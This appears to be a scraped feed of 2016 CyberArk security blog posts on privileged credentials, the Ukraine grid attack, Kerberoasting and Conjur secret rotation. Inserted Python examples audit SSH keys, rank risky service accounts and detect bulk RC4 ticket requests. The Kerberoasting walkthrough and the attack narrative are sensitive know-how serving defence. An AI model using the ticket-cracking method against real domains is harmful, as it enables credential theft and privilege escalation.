Security requires much more than a “following the auditor” mentality – it requires a holistic program. A great example of this mantra can be found in a recent Computerworld article written by a security manager whose name and company were disguised for obvious reasons.  The author discusses the need for his organization to meet requirements for a tougher certification of its credit card-handling practices. Along the way, he was able to prove compliance, but he also discovered the requirements weren’t enough to protect the organization from security risks. He planned to make additional changes as a result.

Used as an attack vector in virtually every advanced targeted attack, it’s widely recognized that unprotected privileged accounts and credentials present critical risks to enterprises. It has become clear that in order to truly protect an organization’s data – and business – from devastating breaches, these privileged accounts and credentials must be secured and managed in order to limit the damage of an attack, to stop lateral movement and to avoid complete network takeovers.

In a short video, CyberArk CMO John Worrall explains that organizations increasingly view privileged account security as a strategic priority – and launch programs not tactical projects. Today, many C-level security professionals have enterprise-wide mandates to address what is now widely viewed as a horizontal risk. Businesses must adapt – add a new layer of security inside the network to secure the IT systems. Businesses run on IT, so the stakes are high if trust is not established and maintained.  Watch the video.

Don’t Overlook the Insider Threat, Protect Privileged Access https://www.cyberark.com/blog/dont-overlook-insider-threat-protect-privileged-access/ Fri, 08 Jul 2016 15:30:28 +0000 https://www.cyberark.com/blog//

A newly released Ponemon Institute study revealed that 72 percent of surveyed organizations are not confident in their ability to manage and control employee access to high-value information, such as trade secrets, new product designs, merger and acquisition activity, financial data and confidential business information. Additionally, the report pointed to privileged company insiders as the biggest threat to enterprises today. Think of the game-changing Snowden revelations or the more recent Panama Papers incident – examples of insiders with access to highly sensitive company information who leaked information to the public.

The same week the Ponemon survey was published, new developments in the highly publicized Morgan Stanley insider data breach emerged, underscoring the severity – and far-reaching consequences – of malicious, privileged insider attacks. To summarize the breach, in 2014 a Morgan Stanley financial adviser gained access to, then illicitly downloaded, customer data from 730,000 customer accounts. He was able to reach these accounts by utilizing privileged credentials that were not properly protected. After he transferred this information to a personal server, a third party breached the system and posted the information for sale on the Internet. After a two-year investigation of the incident – which some experts say was the biggest data theft at a wealth management firm to-date – the SEC determined that Morgan Stanley failed to sufficiently safeguard its customer data from unauthorized access. The company was issued a cease-and-desist order and was fined $1 million – a penalty that demonstrates the SEC’s heightened focus on cyber security.

This case is significant as it represents one of the first times a major industry player – also technically the “victim” of the attack – has been penalized for violating the Safeguards Rule, which requires financial organizations to adopt written policies and procedures reasonably designed to safeguard customer records and information from threats that include unauthorized access. In this particular case, the employee used privileged access to information and blatantly violated company policy. Often the “insider threat” isn’t as black and white as this. Security professionals must be constantly vigilant for many different threats inside the organization – from malicious contractors who have authorized access, to former employees who still have privileged access to business critical systems, to employees at risk of causing unintentional abuse.

To effectively minimize the insider threat, it’s important to first realize that it doesn’t matter where an attack starts or from whom. What matters is that privileged access – not people – is the true insider threat. Once this is understood, it’s critical to implement privileged account security solutions that offer insider threat protection to:

  • Ensure that only authorized users are able to access powerful privileged accounts
  • Prevent users from being able to gain unapproved elevated privileges
  • Establish strict accountability over the use of privileged accounts by tracking who accessed what accounts and what actions were taken
  • Improve forensic analysis by generating a detailed, tamper-proof audit trail of all privileged account activity
  • Rapidly detect, and be alerted on, anomalous activity that could signal an inside attack in-progress

Learn more about how the CyberArk Privileged Account Security Solution helps organizations to proactively limit user privileges and control access to privileged accounts to reduce the risk of an insider attack here on our website.

Lessons Learned from the Ukraine Blackout: 5 Best Practices for Locking Down Privileged Accounts https://www.cyberark.com/blog/lessons-learned-ukraine-blackout-5-best-practices-locking-privileged-accounts/ Wed, 29 Jun 2016 13:11:29 +0000 https://www.cyberark.com/blog//

CyberArk’s cybersecurity researcher Lavi Lazarovitz wrote about some of the key steps attackers took to cause a blackout in Ukraine. By examining the attack path, we’ve identified five best practices for locking down privileged access that, when followed, can help to mitigate risk:

  1. Proactively secure all privileged and ICS credentials: From the IT admin accounts that were compromised in the early phases of the attack to the VPN accounts used to connect to the OT network, the utility companies should have had stronger controls in place to limit access to these powerful system accounts. In addition, proactive scans for privileged accounts and credentials could have helped the companies detect and remove the unauthorized SSH keys that the attackers created to establish persistent access.
  2. Rotate admin credentials after each use: Frequent rotation can stop lateral movement by invalidating credentials that may have been captured. In this case, the attackers could have stolen the admin credentials from the infected endpoints, but as soon as the credentials were rotated, these compromised passwords would have been useless.
  3. Establish a single, controlled access point into ICS systems: In ICS environments, particularly those that control critical infrastructure such as energy, transportation or water, it’s critical that organizations do everything they can to limit and control access to systems. By forcing all ICS users through a single access point, requiring multi-factor authentication, and closing down all other routes into the control systems, companies can reduce the attack surface of critical systems, granularly control exactly who is able to access what systems, and limit the permissions that each operator has on each system. In addition, with all traffic flowing through one location, organizations can monitor and audit exactly who did what and gain the opportunity to detect attacks before they become serious.
  4. Monitor privileged account use to detect anomalies: In this case, the attackers were able to avoid detection for months by masquerading as true users with authorized credentials. However, their behavior was likely very different than that of true users. Behavioral analytics tools can detect anomalous activity and alert security teams to possible attacks in progress. Had the utility companies been monitoring privileged account behavior, they likely would have detected the attackers well in advance of the blackout and system destruction.
  5. Control applications to reduce the risk of malware-based attacks: By controlling application permissions on endpoints and servers, organizations can reduce the damage caused by malware. For example, by restricting untrusted applications from accessing files, the KillDisk malware would not have been able to access and overwrite files throughout the IT environment, thus significantly limiting damage to IT systems.
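The first practice above mentions scanning for SSH keys that an attacker has added for persistence. One way to run that check, given here as an added Python example rather than CyberArk’s product logic, is to compare every key found in each host’s authorized_keys against an approved inventory of fingerprints. The hosts, inventory and key material below are constructed placeholders for the illustration.

```python
"""Audit authorized_keys contents against an approved SSH key inventory.

Added example: the host snapshots, inventory and key material are constructed
placeholders; real fingerprints come from the keys your key management issued.
"""
import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-")


def constructed_blob(seed):
    """Syntactically valid ssh-ed25519 key blob derived from a seed: constructed
    sample data for this example, not a real key (the 32 bytes are a hash)."""
    wire = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + hashlib.sha256(seed.encode()).digest()
    return base64.b64encode(wire).decode()


def ssh_fingerprint(blob_b64):
    """SHA256 fingerprint in the form ssh-keygen prints (base64, '=' padding removed)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (keytype, blob, comment) for each key line. Blank lines, comments and
    malformed lines are skipped; leading options such as no-pty are tolerated
    (options containing quoted spaces are beyond this simple tokenizer)."""
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue
        try:
            base64.b64decode(tokens[idx + 1], validate=True)
        except ValueError:
            continue  # not a key blob at all
        yield tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:])


def audit_host(host, authorized_keys_text, approved):
    """Return one finding per key on the host whose fingerprint is not in
    `approved` (a mapping fingerprint -> owner)."""
    findings = []
    for keytype, blob, comment in parse_authorized_keys(authorized_keys_text):
        fp = ssh_fingerprint(blob)
        if fp not in approved:
            findings.append({"host": host, "keytype": keytype, "fingerprint": fp, "comment": comment})
    return findings


def audit_fleet(snapshots, approved):
    """snapshots: {host: authorized_keys text}; returns all findings across hosts."""
    return [f for host, text in snapshots.items() for f in audit_host(host, text, approved)]


# Constructed inventory: fingerprints of the keys that were legitimately issued.
APPROVED = {ssh_fingerprint(constructed_blob("ops-alice")): "alice",
            ssh_fingerprint(constructed_blob("ops-bob")): "bob"}

# Constructed snapshots of authorized_keys collected from two hosts; the second
# carries a key with options and no comment that is not in the inventory.
SNAPSHOTS = {
    "hmi-01": "\n".join([f"ssh-ed25519 {constructed_blob('ops-alice')} alice@ops",
                         f"ssh-ed25519 {constructed_blob('ops-bob')} bob@ops"]),
    "vpn-gw": "\n".join(["# constructed sample",
                         f"ssh-ed25519 {constructed_blob('ops-alice')} alice@ops",
                         f"no-pty ssh-ed25519 {constructed_blob('not-in-inventory')}",
                         "ssh-ed25519 not-base64!! broken"]),
}

if __name__ == "__main__":
    for finding in audit_fleet(SNAPSHOTS, APPROVED):
        print(finding)
```

The fingerprint format matches what `ssh-keygen -l -E sha256` prints, so the inventory can be populated from the keys your key-management process actually issued; a key that carries options but no comment, like the one in the sample, is still parsed and flagged, which a naive “type blob comment” split would miss.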

While this was a sophisticated, highly coordinated attack, proactive privileged account controls layered with behavioral analytics tools, such as those CyberArk provides, could have helped the energy companies block lateral movement early on, detect if the attackers were able to capture credentials, and ultimately, prevent the end goal of a massive, unprecedented blackout.

For more information, join CyberArk for a 20 minute debrief analysis on the Ukraine Power Grid Attack on July 27, 2016 at 2:00 pm ET. Register here: https://lp.cyberark.com/2016.07.27UkrainePowerGridAttackDebrief_LandingPage.html

]]>
The Ukraine Blackout: Four Key Moves the Attackers Made https://www.cyberark.com/blog/ukraine-blackout-four-key-moves-attackers-made/ Wed, 29 Jun 2016 13:06:31 +0000 https://www.cyberark.com/blog// On December 23, 2015, the western region of Ukraine experienced a sweeping blackout.  Two of the three electricity providers in the area fell victim to a cyber attack that shut off electricity throughout the region and purposely made remediation extremely difficult.  An estimated 225,000 residents throughout Ukraine were left in the dark, IT and OT systems were completely overwritten, and the power companies were left to manually fix damage at impacted substations throughout the region.

As we’ve outlined in previous posts, the use of stolen privileged credentials to remotely access critical industrial control systems (ICS) assets is the most common threat to power grids. In this article, we’ll highlight some of the key steps the attackers took to carry out their plan.

Step 1: Perimeter Compromise

The network perimeter was compromised via a spear phishing campaign, in which the attackers disguised themselves as legitimate system vendors and members of the government. They sent phishing emails to IT staff and system administrators at the utility companies and employees at targeted companies.

Believing the emails were legitimate, the individual victims opened the emails and the attached Microsoft Office documents, which contained a malicious macro. Though Microsoft prompted the users to verify if they wanted to run the macro, the employees complied since they believed the email was legitimate. As soon as the users opened the malicious macro, the malware installed itself on the users’ machines. The malware immediately installed a RAT, established a connection with its Command and Control server and began sending information to the C&C.

At this point, a secondary piece of malware known as KillDisk was installed in a dormant state. This KillDisk malware was capable of overwriting the vast majority of files on all infected systems and rendering each system unbootable. From there, the attackers began the reconnaissance phase of the attack. They used their remote access to log into systems and guess and steal credentials until they eventually captured admin credentials.

Step 2: Lateral Movement and Escalation

Using the compromised admin credentials, the attackers began moving laterally through the IT environment. Because they were masquerading as true, authorized users, they were able to stay under the radar of intrusion detection systems. As the attackers moved, they continued to install the KillDisk malware for use at a later time, and where necessary, set up SSH backdoors to ensure persistent remote access, just in case.

As the attackers roamed the network, they discovered that the back office workstations used to control the electric breakers could be accessed over an internal VPN.  Contrary to best practices, these systems were not air-gapped, and VPN access only required single factor authentication.

Using compromised credentials, the attackers logged into the VPN to remotely connect to workstations in the control room. For several weeks, the attackers simply watched and learned. They learned how the operators accessed and controlled the systems, and how updates were remotely applied to systems in the field. Prior to the final stages of attack, not only did the attackers continue to spread the KillDisk malware through the IT environment, but they also applied the malware to the grid systems via a firmware update and tested it to make sure that it would work.

Step 3: Attack Execution

When the attack team was ready, the attackers began to execute against their end goal: take down power across Ukraine and disrupt remediation. The attackers took control of workstations in the control room and remotely disabled the mice and keyboards, so that system operators could not intervene in the event they noticed the takeover.

From the workstations, the attackers logged into the Human Machine Interface (HMI), which served as the UI to control the grid systems, and disconnected systems, opened breakers, and shut down electricity at 30 substations. The attackers next disabled backup power supplies to two of the three energy distribution centers. As the power went out across Ukraine, the system operators were left without the ability to take back control of their machines and stop the attack.

Step 4: Proactively Block Remediation Efforts

As the final step, the attackers did their best to prevent a swift remediation of the incident. First, they launched a DDoS attack against the companies’ call centers, overwhelming the phone lines, so that customers were unable to reach the power companies to report the outages. This was done so that, in the event the companies did not see the machine takeover and detect the attack, customers would be unable to call in to report the outages. This significantly delayed the time to detection for one of the victim utility companies.

Second, the attackers activated the KillDisk malware that was previously installed on both the IT systems and the grid systems. In the IT environment, the malware overwrote approximately 40 file types on all infected systems and then wiped the hard drives. In the OT environment, KillDisk was installed and activated on sixteen substations, leaving them unresponsive to remote commands by operators. Without functioning IT or OT systems, the utilities were delayed from remediating the incident and restoring service. To finally get electricity back up and running, utility workers had to drive to the power stations to manually reset the breakers. Even three months following the attack, workers must still manually control the breakers at the impacted substations.

The role of privilege in this historic cyber attack was significant for three major reasons. First, the attackers were able to guess and capture administrative credentials from infected endpoints. Second, using the compromised and static credentials, the attackers moved laterally throughout the environment, escalated privileges and installed SSH backdoors along the way.  This enabled persistent, privileged access to the network, and eventually enabled the attackers to VPN into the OT environment from the IT environment. And finally, using privileged access, the attackers shut down power systems, corrupted OT systems, and wiped endpoints and servers throughout the IT environment – leaving residents in the dark and leaving power companies with little ability to easily restore electricity.

It’s important to understand the attack path, and use the lessons learned to improve proactive security measures. For more information, read Lauren Horaist’s article, “Lessons Learned from the Ukraine Blackout: 5 Best Practices for Locking Down Privileged Accounts.”

]]>
Webcast: DevOps, Security, and Compliance – No BS Edition https://www.cyberark.com/blog/webcast-devops-security-and-compliance-no-bs-edition/ Tue, 28 Jun 2016 19:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/webcast-devops-security-and-compliance-no-bs-edition/  

Join us for a live webcast Wednesday June 29 at 2PM eastern on securing your DevOps pipeline.

High-performing organizations deploy code continuously – 30x more often with 50% fewer failures.

What about continuous security?

Speed helps to boost an enterprise’s productivity, profitability, and market share. To keep innovation and speed in an upward trajectory, DevOps teams use the latest tools and processes to scale. But many of these tools lack information security best practices to the dismay of security and compliance teams.

Elizabeth Lawler demonstrates how to bring DevOps, security, and compliance teams together, bridging this gap and forging a secure infrastructure for your company. Topics:

  • Getting DevOps, Security & Compliance on the same page
  • Meaningful security & compliance metrics
  • Access policies & enforcement for code, machines, and people
  • Ensuring a full audit log for compliance
  • Tales from the wild – how DevOps leaders succeed with these practices
]]>
Service Accounts – Weakest Link in the Chain? https://www.cyberark.com/blog/service-accounts-weakest-link-chain/ Thu, 23 Jun 2016 18:16:36 +0000 https://www.cyberark.com/blog//

At DerbyCon 2014, Tim Medin introduced a novel technique to elevate privileges by exploiting service accounts in Windows networks leveraging Active Directory and Kerberos. This method requires the service to be executed in the security context of a user account and to support Kerberos authentication. It allows an attacker to request a Kerberos ticket for the vulnerable service instance (SPN) and potentially crack the ticket offline to recover the service’s secret key. Using that key, an attacker could forge an arbitrary ticket (Silver Tickets) and deceive the service into believing that the authenticating account is another user or has different group memberships.

Inspired by Medin’s work, CyberArk Labs developed RiskySPNs, an open-source tool presented at BSidesSF, which identifies vulnerable services and service accounts. The tool enables blue teams to mitigate this threat and red teams to detect and abuse the services and service accounts. Unlike other projects such as Kerberoast, RiskySPNs facilitates the identification of which accounts are most vulnerable and valuable by gathering a variety of information about the vulnerable services and the service account that runs them. This also increases the cracking efficiency and avoids unnecessary abnormal traffic and event logs on the Domain Controller.

Overview

Services in Windows networks are usually ‘kerberized’ (i.e. support Kerberos authentication) and are registered under a security principal (user or computer account) as a Service Principal Name (SPN) on the Active Directory. This enables Kerberos clients to uniquely identify the instance of the service and request a Kerberos service ticket (also called ticket granting service or TGS) to it. This ticket will be encrypted using the service’s long-term secret key derived from the security principal’s password.

Using Microsoft’s built-in setspn tool, it is possible to query Active Directory and retrieve all available SPNs in the user’s domain/forest.

(Screenshot: setspn query listing registered SPNs)

Retrieving tickets

Because Kerberos only deals with authentication and each service is responsible for authorizing clients, any domain user can request a Kerberos service ticket (TGS) from a Domain Controller for any service, even if the user has no permission or intention to access that service. In fact, the service (or server) doesn’t even have to be available to retrieve a valid ticket. Using the Get-TGSCipher function from the RiskySPNs module, it is easy to obtain a service ticket for a service instance by its SPN.

(Screenshot: Get-TGSCipher output)

The security principal (Target) that represents this service instance is retrieved by querying Active Directory for the account under which the SPN is registered. The encryption type and the encrypted server portion of the ticket (EncTicketPart) are extracted from the ticket-request stream. Doing this by hand typically requires multiple tools, such as Mimikatz, to export the ticket (kirbi file) from the client’s memory and then extract the encrypted server portion from it. This portion is encrypted with the secret key derived (hashed) from the password of the security principal associated with the SPN.

Detecting vulnerable SPNs

SPNs associated with computer accounts are not feasible to crack because computer accounts use long, random, automatically rotated passwords by default. User accounts, however, are likely to have guessable (non-random, relatively short) passwords. Regardless of the domain functional level or the host’s Windows version, service tickets for SPNs registered under a user account are encrypted with the old RC4-HMAC suite rather than the newer AES ciphers that have been the default since Windows Server 2008/Vista. The key used for encryption and decryption with the RC4-HMAC (23) encryption type is simply the unsalted NTLM hash of the account’s password. This is probably due to backward compatibility and interoperability concerns.

Service accounts are often privileged, and their passwords are frequently set to never expire. Web and database services often integrate with Kerberos to enable SSO and run in the security context of a privileged user account. Find-PotentiallyCrackableAccounts, another script in the RiskySPNs module, queries Active Directory and reveals juicy information about user accounts associated with SPNs. The function checks the user’s group memberships and determines whether the user is a member of a sensitive group (such as Domain Admins). It also highlights the account’s encryption type and whether there is a cracking window, that is, how long the current password remains valid before the user is forced to reset it.

(Screenshot: Find-PotentiallyCrackableAccounts output)

Additionally, the Export-PotentiallyCrackableAccounts script can be used to export even more data about risky user accounts and their associated SPNs to a CSV file for further analysis (useful for blue teams).
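The attributes Find-PotentiallyCrackableAccounts reports on map directly to Active Directory attributes a blue team can query themselves. The following is an added example, not the RiskySPNs module, that triages a constructed snapshot of AD user and computer objects: it keeps only enabled user accounts with an SPN (computer and disabled accounts are out of scope, as the text explains), treats an unset msDS-SupportedEncryptionTypes on a user account as RC4-only (the behaviour described above), computes the cracking window from pwdLastSet and the domain’s maxPwdAge, and ranks the results. The attribute names and the userAccountControl and encryption-type flag values are the real AD ones; the account records, the list of sensitive groups, the maxPwdAge value and the scoring weights are assumptions made for illustration.

```python
"""Triage user accounts that carry SPNs, highest remediation priority first.

Added example, not the RiskySPNs module. ACCOUNTS is a constructed snapshot of
the AD attributes discussed in the post; in practice it would come from LDAP.
"""
from datetime import datetime, timedelta

# userAccountControl bits
ACCOUNTDISABLE = 0x0002
DONT_EXPIRE_PASSWD = 0x10000
# msDS-SupportedEncryptionTypes bits
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10

# Assumed list of groups worth treating as sensitive; extend per environment.
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Account Operators"}

NOW = datetime(2016, 6, 23)          # evaluation date (constructed)
MAX_PWD_AGE = timedelta(days=90)     # domain maxPwdAge (constructed)

# Constructed snapshot of directory objects.
ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "memberOf": ["Domain Admins"], "userAccountControl": 0x10200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
     "msDS-SupportedEncryptionTypes": None, "pwdLastSet": datetime(2013, 1, 15)},
    {"sAMAccountName": "svc_web", "objectClass": "user",
     "servicePrincipalName": ["HTTP/intranet.corp.local"],
     "memberOf": ["Web Operators"], "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": AES128 | AES256, "pwdLastSet": datetime(2016, 5, 1)},
    {"sAMAccountName": "svc_old", "objectClass": "user",
     "servicePrincipalName": ["HOST/legacy01"], "memberOf": [],
     "userAccountControl": 0x202,  # NORMAL_ACCOUNT | ACCOUNTDISABLE
     "msDS-SupportedEncryptionTypes": None, "pwdLastSet": datetime(2012, 1, 1)},
    {"sAMAccountName": "FILESRV01$", "objectClass": "computer",
     "servicePrincipalName": ["HOST/filesrv01.corp.local"], "memberOf": [],
     "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT
     "msDS-SupportedEncryptionTypes": AES256, "pwdLastSet": datetime(2016, 6, 1)},
]


def assess(acct, now=NOW, max_pwd_age=MAX_PWD_AGE):
    """Return a risk record for an enabled user account with an SPN, or None if out of scope."""
    uac = acct["userAccountControl"]
    if acct["objectClass"] != "user" or not acct["servicePrincipalName"] or uac & ACCOUNTDISABLE:
        return None  # computer accounts rotate random passwords; disabled accounts cannot be used
    enc = acct["msDS-SupportedEncryptionTypes"]
    # Unset on a user account means tickets are issued with RC4-HMAC, as described in the post.
    rc4_only = enc is None or not (enc & (AES128 | AES256))
    never_expires = bool(uac & DONT_EXPIRE_PASSWD)
    if never_expires:
        window_days = None  # unbounded cracking window
    else:
        window_days = max(0, (acct["pwdLastSet"] + max_pwd_age - now).days)
    sensitive = sorted(set(acct["memberOf"]) & SENSITIVE_GROUPS)
    # Assumed weights: privilege counts most, then weak crypto, then a long or unbounded window.
    score = (3 if sensitive else 0) + (2 if rc4_only else 0)
    score += 2 if never_expires else (1 if window_days and window_days > 30 else 0)
    return {"account": acct["sAMAccountName"], "spns": acct["servicePrincipalName"],
            "sensitive_groups": sensitive, "rc4_only": rc4_only,
            "password_never_expires": never_expires, "cracking_window_days": window_days,
            "score": score}


def find_risky_spn_accounts(accounts=ACCOUNTS):
    """Rank in-scope accounts with the highest risk first."""
    results = [r for r in (assess(a) for a in accounts) if r]
    return sorted(results, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in find_risky_spn_accounts():
        print(r)
```

Remediation follows from the fields: a high-scoring account needs a long random password (or conversion to a group Managed Service Account), AES enabled via msDS-SupportedEncryptionTypes, removal from sensitive groups where possible, and a password expiry so the cracking window is bounded.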

Cracking the ticket

With the encrypted portion in hand and the encryption type known, it is possible to crack the ticket offline. When the service runs under an account created by a human, it will probably have a password that can be cracked. Because the ticket is protected with symmetric encryption, a dictionary or brute-force attack is possible: derive (hash) keys from a list of candidate passwords and try to decrypt the ticket with each of them. The key that successfully decrypts the ticket (the output contains a valid ticket structure) is certainly derived from the service account’s clear-text password. Both Hashcat and John the Ripper, two well-known password-cracking tools, support Kerberos service ticket (TGS_REP/AP_REQ) cracking modes.

(Screenshot: John the Ripper output for a Kerberos service ticket)

Cracking the ticket could allow an attacker to efficiently escalate privileges by creating Silver Tickets (will be described in another blog post) or simply impersonate the service account by logging in with the appropriate credentials.

Because Active Directory queries and Kerberos service ticket requests are both legitimate actions that occur all the time, such reconnaissance should not trigger any suspicion (unless a large number of tickets is requested). From an attacker’s perspective, SPNs associated with user accounts that are members of a sensitive group, configured to use RC4-HMAC encryption and with an open cracking window would be a potential gold (or actually a silver) mine. These service accounts are often predictable, discoverable and accessible from anywhere in the network, which makes them more likely to be chosen over other attack vectors.
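The one detection hook the paragraph above concedes is volume: a single principal requesting many service tickets, with RC4 encryption, for services that belong to user accounts. Domain Controllers record every service ticket request as Windows Security event 4769, whose fields include Account Name, Service Name, Ticket Encryption Type (0x17 is RC4-HMAC, 0x12 is AES256) and Client Address. The following added example (not CyberArk’s, and not part of RiskySPNs) runs that check over a constructed batch of 4769 records reduced to those four fields plus a timestamp; the account names, IPs and thresholds are assumptions, and the same logic expressed as a SIEM query is the production form.

```python
"""Spot bulk RC4 service-ticket requests in Windows Security event 4769 records.

Added example, not CyberArk code. EVENTS is constructed: (time, requesting
account, service name, ticket encryption type, client address).
"""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"  # Ticket Encryption Type value for RC4-HMAC in event 4769

EVENTS = [
    ("2016-06-23T09:00:01", "jdoe", "svc_sql", "0x17", "10.0.5.21"),
    ("2016-06-23T09:00:02", "jdoe", "svc_web", "0x17", "10.0.5.21"),
    ("2016-06-23T09:00:02", "jdoe", "svc_backup", "0x17", "10.0.5.21"),
    ("2016-06-23T09:00:03", "jdoe", "svc_report", "0x17", "10.0.5.21"),
    ("2016-06-23T09:00:03", "jdoe", "FILESRV01$", "0x17", "10.0.5.21"),   # computer SPN, out of scope
    ("2016-06-23T09:00:04", "jdoe", "krbtgt", "0x12", "10.0.5.21"),        # TGT renewal noise
    ("2016-06-23T09:05:00", "asmith", "svc_sql", "0x12", "10.0.5.30"),     # AES tickets, normal use
    ("2016-06-23T09:06:00", "asmith", "svc_web", "0x12", "10.0.5.30"),
    ("2016-06-23T11:00:00", "bwong", "svc_web", "0x17", "10.0.5.44"),      # a single RC4 ticket is normal
]


def detect_rc4_ticket_bursts(events, threshold=3, window_minutes=5):
    """Return one alert per requesting account whose RC4 tickets for distinct
    user-owned services reach `threshold` inside `window_minutes`."""
    per_account = defaultdict(list)
    for ts, requester, service, enc_type, client in events:
        if enc_type != RC4_HMAC:
            continue
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and the KDC are not the user service accounts discussed above
        per_account[requester].append((datetime.fromisoformat(ts), service, client))

    alerts = []
    for requester, reqs in per_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over this account's RC4 requests
            while (reqs[end][0] - reqs[start][0]).total_seconds() > window_minutes * 60:
                start += 1
            services = {s for _, s, _ in reqs[start:end + 1]}
            if len(services) >= threshold:
                alerts.append({"account": requester, "client": reqs[end][2],
                               "services": sorted(services),
                               "first": reqs[start][0].isoformat(),
                               "last": reqs[end][0].isoformat()})
                break  # one alert per account per batch
    return alerts


if __name__ == "__main__":
    for alert in detect_rc4_ticket_bursts(EVENTS):
        print(alert)
```

Tune the threshold to the environment: a user who legitimately opens a SQL console, an intranet site and a file share in one minute will hit three services, but rarely with RC4 if AES is enabled on the service accounts, which is why enabling AES (the remediation from the previous section) also makes this detection far less noisy.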

References:

  • Service Principal Names
  • Attacking Kerberos: Kicking the Guard Dog
  • Kerberoast
  • Active Directory Security


]]>
Reinforcing the Identity Perimeter https://www.cyberark.com/blog/reinforcing-identity-perimeter/ Thu, 16 Jun 2016 14:08:31 +0000 https://www.cyberark.com/blog//

Identities and their credentials are considered to be a major vulnerability. It’s been well documented that nearly all advanced attacks investigated involved stolen credentials, and whenever possible, attackers go after privileged credentials. So it comes as no surprise that companies seek to reinforce new identity perimeters by extending their IAM solution visibility and control to privileged users, applications and access entitlements.

As part of the C³ Alliance, leading Identity and Access Management (IAM) solution providers have integrated their solutions with CyberArk Privileged Account Security to give mutual customers unified identity and access governance solutions for all identity types – privileged and non-privileged users and applications.

With the joint solution in place, companies can fully manage privileged users and application entitlements lifecycles through their IAM solution. They can effectively create, review and approve privileged user access permissions based upon group affiliations, roles and other commonalities directly from the IAM solution. What’s more, all privileged access requests are verified using an automated approval workflow.

To address common risks and challenges, companies can update user or group access privileges directly from the IAM solution to avoid orphan privileged accounts, privileged entitlement creep and excessive privileged permissions. Consider this scenario: an Oracle Database Administrator, who is a privileged user, is also granted access to MS-Windows domain accounts while retaining previous access privileges to root accounts. This dual access may constitute a Segregation-of-Duties (SoD) violation, which can result in more than a failed audit. Leveraging the CyberArk integrated solution, the IAM system will be able to alert on SoD violations, so that user access permissions can be updated. Performing periodic reviews and re-certification of privileged access directly from IAM is also possible.

To effectively manage all privileged identities, accounts used by commercial-off-the-shelf (COTS) applications and custom/in-house applications must also be considered. Many organizations overlook the fact that these applications are also granted administrative privileges to access many assets on the network. Whether it’s a financial management application, inventory discovery software or a vulnerability and compliance management solution, they are all granted administrative privileges by the organization to access sensitive assets on the network.

For example, in order for a vulnerability assessment tool to execute an authenticated scan, a domain admin account or a service account credential is used to access the file system on the target machine. Therefore, IAM solutions should also provide users with visibility and control of access permissions for applications. Defining application access permissions and the ability to manage these accounts automatically is key, as well as enforcing any permission changes to ensure the application can only access authorized assets.

To learn more about CyberArk partnerships with leading IAM vendors, click here

C³ Alliance: SailPoint & CyberArk

C³ Alliance: RSA, The Security Division of EMC & CyberArk

]]>
What’s New in Conjur 4.7 https://www.cyberark.com/blog/whats-new-in-conjur-4-7/ Mon, 13 Jun 2016 17:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/whats-new-in-conjur-4-7/  

We are proud to announce the release of Conjur 4.7! Conjur is privileged access management and security software that helps digital businesses secure access to the thousands of system resources that compose modern applications.

This release focuses on enhancing Conjur’s core functionality with several new features and improving the scalability of existing systems. Highlights include:

Please see the full 4.7.0 release notes for more details and the full list of changes in this release.

Read on to learn more about the major new features in Conjur 4.7.



Built-in rotators for secrets

The longer a secret remains unchanged, the more vulnerable it becomes. The way to mitigate any risk of compromise is to use a complex secret and to change it often. The Conjur rotator service meets this requirement by automatically generating and rotating the secrets used to access an underlying system.

Rotation in the Conjur UI

Rotators released in Conjur 4.7 enable rotation of these targets:

Rotation is enabled by annotating variables with the rotator to use and a TTL (how often to rotate).
For example, setting up rotation of AWS credentials with Conjur policy:

---
- !policy
  id: aws
  body:
   - !variable region
   - !variable access_key_id
   - !variable
     id: secret_access_key
     annotations:
       rotation/rotator: aws/secret_key
       rotation/ttl: P1D # 1 day

Future releases of Conjur will include rotators for more targets.

Read more about rotation on our developer site.
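The policy above declares intent; whether rotation actually happened on schedule is the compliance question. As an added example (not Conjur’s code), the script below parses the ISO 8601 duration used in the `rotation/ttl` annotation (P1D, PT12H, P1DT6H and so on), computes each variable’s next due time from its last successful rotation, and reports which managed secrets are overdue. The annotation names are the ones from the policy; the variable list, the last-rotation timestamps and the evaluation time are constructed, and in practice the timestamps would come from the rotation history or the audit log.

```python
"""Report which rotated secrets are overdue relative to their rotation/ttl annotation.

Added example, not Conjur's code. VARIABLES is constructed; Conjur performs the
rotation itself, this is only a compliance check over the recorded history.
"""
import re
from datetime import datetime, timedelta

# Days/hours/minutes/seconds subset of ISO 8601 durations (no years, months or weeks).
_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def parse_iso_duration(text):
    """Turn 'P1D', 'PT12H' or 'P1DT6H' into a timedelta; reject anything else."""
    m = _DURATION.match(text)
    if not m or text in ("P", "PT"):
        raise ValueError(f"unsupported duration: {text}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return timedelta(days=days, hours=hours, minutes=minutes, seconds=seconds)


# Constructed: variable id, its annotations, and the last successful rotation time.
VARIABLES = [
    {"id": "aws/secret_access_key",
     "annotations": {"rotation/rotator": "aws/secret_key", "rotation/ttl": "P1D"},
     "last_rotated": datetime(2016, 6, 12, 8, 0)},
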